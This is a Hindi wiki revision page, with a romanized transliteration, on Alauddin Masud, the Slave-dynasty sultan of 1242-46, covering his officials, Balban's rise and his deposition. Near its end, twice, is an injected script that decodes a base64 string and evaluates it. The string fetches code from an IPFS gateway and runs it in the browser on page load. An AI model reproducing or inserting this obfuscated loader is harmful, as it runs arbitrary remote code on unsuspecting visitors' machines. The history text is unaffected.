Difference between revisions of "अलाउद्दीन मसूद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
अलाउद्दीन मसूद [[ग़ुलाम वंश]] का सातवाँ सुल्तान (1242-46 ई.) था। वह सुल्तान [[रुकनुद्दीन]] का बेटा था, जो सुल्तान [[इल्तुतमिश]] (1211-1236 ई.) का दूसरा बेटा और उत्तराधिकारी था। वह [[रज़िया सुल्तान||सुल्ताना रज़िया]] (1236-1240 ई.) के गद्दी से हटाये जाने के बाद सुल्तान बना। अलाउद्दीन मसूद अयोग्य शासक था। जिसे 1246 ई. में अमीरों ने तख्त से उतार दिया और [[नासिरुद्दीन]] को सुल्तान बनाया।
+
*'''अलाउद्दीन मसूद''' (1242 - 1246 ई.), [[रूकुनुद्दीन फ़ीरोज़शाह]] का पौत्र तथा [[मुइज़ुद्दीन बहरामशाह]] का पुत्र था।
 +
*उसके समय में नाइब का पद ग़ैर तुर्की सरदारों के दल के नेता मलिक कुतुबुद्दीन हसन को मिला।
 +
*क्योंकि अन्य पदों पर तुर्की सरदारों के गुट के लोगों का प्रभुत्व था, इसलिए नाइब के पद का कोई विशेष महत्व नहीं रह गया था।
 +
*शासन का वास्तविक अधिकार वज़ीर मुहाजबुद्दीन के पास था, जो जाति से ताजिक (ग़ैर तुर्क) था।
 +
*तुर्की सरदारों के विरोध के परिणामस्वरूप यह पद नजुमुद्दीन अबू बक्र को प्राप्त हुआ।
 +
*इसी के समय में बलबन को हाँसी का अक्ता प्राप्त हुआ।
 +
*‘अमीरे हाजिब’ का पद [[इल्तुतमिश]] के ‘चालीस तुर्कों के दल’ के सदस्य [[गयासुद्दीन बलबन]] को प्राप्त हुआ।
 +
*1245 में [[मंगोल|मंगोलों]] ने उच्छ पर अधिकार कर लिया, परन्तु बलबन ने मंगोलों को उच्छ से खदेड़ दिया, इससे बलबन की प्रतिष्ठा बढ़ गयी।
 +
*अमीरे हाजिब के पद पर बने रह कर बलबन ने शासन का वास्तविक अधिकार अपने हाथ में ले लिया।
 +
*अन्ततः बलबन ने [[नसीरूद्दीन महमूद]] एवं उसकी माँ से मिलकर अलाउद्दीन मसूद को सिंहासन से हटाने का षडयंत्र रचा।
 +
*जून, 1246 में उसे इसमें सफलता मिली। बलबन ने अलाउद्दीन मसूद के स्थान पर [[इल्तुतमिश]] के प्रपौत्र नसीरूद्दीन महमूद को सुल्तान बनाया।
 +
*मसूद का शासन तुलनात्मक दृष्टि से शांतिपूर्ण रहा। इस समय सुल्तान तथा सरदारों के मध्य संघर्ष नहीं हुए।
 +
*वास्तव में यह काल बलबन की 'शांति निर्माण' का काल था।
 +
 
 +
{{प्रचार}}
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{ग़ुलाम वंश}}
 
{{ग़ुलाम वंश}}
[[Category:मध्य काल]][[Category:ग़ुलाम वंश]][[Category:इतिहास कोश]]__INDEX__
+
 
 +
[[Category:इतिहास_कोश]]
 +
[[Category:ग़ुलाम_वंश]]
 +
[[Category:मध्य_काल]]
 +
__INDEX__

Revision as of 14:31, 21 February 2011

  • alauddin masood (1242 - 1246 ee.), rookunuddin firozashah ka pautr tatha muizuddin baharamashah ka putr tha.
  • usake samay mean naib ka pad gair turki saradaroan ke dal ke neta malik kutubuddin hasan ko mila.
  • kyoanki any padoan par turki saradaroan ke gut ke logoan ka prabhutv tha, isalie naib ke pad ka koee vishesh mahatv nahian rah gaya tha.
  • shasan ka vastavik adhikar vazir muhajabuddin ke pas tha, jo jati se tajik (gair turk) tha.
  • turki saradaroan ke virodh ke parinamasvaroop yah pad najumuddin aboo bakr ko prapt hua.
  • isi ke samay mean balaban ko haansi ka akta prapt hua.
  • ‘amire hajib’ ka pad iltutamish ke ‘chalis turkoan ke dal’ ke sadasy gayasuddin balaban ko prapt hua.
  • 1245 mean mangoloan ne uchchh par adhikar kar liya, parantu balaban ne mangoloan ko uchchh se khade d diya, isase balaban ki pratishtha badh gayi.
  • amire hajib ke pad par bane rah kar balaban ne shasan ka vastavik adhikar apane hath mean le liya.
  • antatah balaban ne nasirooddin mahamood evan usaki maan se milakar alauddin masood ko sianhasan se hatane ka shadayantr racha.
  • joon, 1246 mean use isamean saphalata mili. balaban ne alauddin masood ke sthan par iltutamish ke prapautr nasirooddin mahamood ko sultan banaya.
  • masood ka shasan tulanatmak drishti se shaantipoorn raha. is samay sultan tatha saradaroan ke madhy sangharsh nahian hue.
  • vastav mean yah kal balaban ki 'shaanti nirman' ka kal tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>